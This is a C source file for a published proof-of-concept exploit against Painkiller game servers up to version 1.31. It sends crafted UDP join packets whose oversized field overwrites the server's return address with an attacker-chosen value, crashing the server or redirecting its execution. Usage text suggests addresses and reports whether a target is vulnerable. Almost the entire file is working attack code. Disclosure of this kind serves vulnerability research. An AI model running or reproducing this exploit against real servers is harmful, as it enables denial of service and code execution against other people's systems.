/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER         "0.1"
#define BUFFSZ      2048
#define PORT        3455
#define TIMEOUT     3
#define GAMEVER     "1.3"
#define INFO        "\xfe\xfd\x00\xDE\xAD\xC0\xDE\xff\xff\xff"
#define CONN        "\xff\xff\xff\xff\x02"
#define JOIN1       "\xff\xff\xff\xff\x04" \
                    GAMEVER  "\0" \
                    "105.263" "\0"
#define JOIN2       "\x00\x00\x00\x00" "\xde\xad\xc0\xde"
#define BOOMSZ      548
#define RETBACKOFF  28

#define SENDRECV(x) \
    if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) \
      < 0) std_err(); \
    if(timeout(sd) < 0) { \
        fputs("\nError: socket timeout, no answer received\n", stdout); \
        exit(1); \
    } \
    len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
    if(len < 0) std_err(); \
    buff[len] = 0;



void show_info(u_char *buff, int len);
u_int check_ret_addr(char *data);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                len;
    u_short     port = PORT;
    u_char      buff[BUFFSZ + 1],
                *ptr;
    struct  sockaddr_in peer;
    u_int      ret_addr;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Painkiller <= 1.31 code execution bug "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <ret_addr> <host> [port(%d)]\n"
            "\n"
            " ret_addr is a memory address where you want to point the code flow.\n"
            " I have implemented only the ret_addr of the dedicated server because the\n"
            " normal game needs a different one, so the dedicated server crashs but you can\n"
            " also choose a return address (EIP) while the normal game simply crashs.\n"
            " ret_addr is automatically verified by this PoC because only the bytes from\n"
            " 0x00 to 0x3f are allowed.\n"
            " If you don't know what to use, insert: 0x32103210 or 0x33333333\n"
            " Some addresses like 0x11111111 instead freeze the server with CPU at 100%%\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    ret_addr = check_ret_addr(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\n"
        "- Target                   %s:%hu\n"
        "- Real return address:     %s\n"
        "- Encoded return address:  0x%08x\n",
        inet_ntoa(peer.sin_addr),
        port,
        argv[1],
        ret_addr);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("- Request informations:\n", stdout);
    SENDRECV(INFO);
    show_info(buff, len);

    fputs("- Send connection request packet\n", stdout);
    SENDRECV(CONN);
    printf("- Server challenge: %s\n", buff + 5);

    ptr = (u_char *)memcpy(buff, JOIN1, sizeof(JOIN1) - 1) +
        sizeof(JOIN1) - 1;

    ptr = (u_char *)memset(ptr, '0', 72) + 72;  // Gamespy key auth
    *ptr++ = 0;                              // key auth delimiter

    ptr = (u_char *)memset(ptr, 'a', BOOMSZ) + BOOMSZ;
    *(u_int *)(ptr - RETBACKOFF) = ret_addr;   // dedicated server ret_addr
    *ptr++ = 0;                              // password delimiter

    ptr = (u_char *)memcpy(ptr, JOIN2, sizeof(JOIN2) - 1) +
        sizeof(JOIN2) - 1;

    fputs("- Send BOOM packet with return address overwriting\n", stdout);
    if(sendto(sd, buff, ptr - buff, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
    }

    close(sd);

    return(0);
}



void show_info(u_char *buff, int len) {
    u_char  *p1,
            *p2,
            *limit;
    int     nt = 0;

    limit = buff + len;
    p1 = buff + 5;
    while(p1 < limit) {
        p2 = strchr(p1, 0x00);
        if(!p2) break;
        *p2 = 0;

        if(!nt) {
            if(p1 == p2) break;
            printf("%30s: ", p1);
            nt++;
        } else {
            printf("%s\n", p1);
            nt = 0;
        }
        p1 = p2 + 1;
    }
    fputc('\n', stdout);
}



u_int check_ret_addr(char *data) {
    u_int  ret = 0;
    u_char  *retc;
    int     tmp,
            i;

    retc = ((u_char *)&ret) + 3;

    if((data[1] == 'x') || (data[1] == 'X')) data += 2;

    if(strlen(data) != 8) {
        fputs("\n"
            "Error: please use a full offset of 4 hex numbers.\n"
            "       For example: 0x12341234, 12341234, 00001234, 0x33333333 and so on\n"
            "\n", stdout);
        exit(1);
    }

    for(i = 0; i < 4; i++) {
        sscanf(data, "%02x", &tmp);
        if(tmp > 0x3f) {
            printf("\n"
                "Error: the return address cannot contain bytes greater than 0x3f (your: 0x%02x).\n"
                "       For example 0x12341234 contains 0x12, 0x34, 0x12 and 0x34 that are ok.\n"
                "       While 0x12345678 is not ok because 0x56 and 0x78 are greater than 0x3f\n"
                "\n", tmp);
            exit(1);
        }
        if(tmp <= 9) {
            *retc = tmp + 0x30;
        } else if((tmp >= 0xa) && (tmp <= 0x23)) {
            *retc = tmp + 0x57;
        } else {
            *retc = tmp + 0x1d;
        }
        retc--;
        data += 2;
    }

    return(ret);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


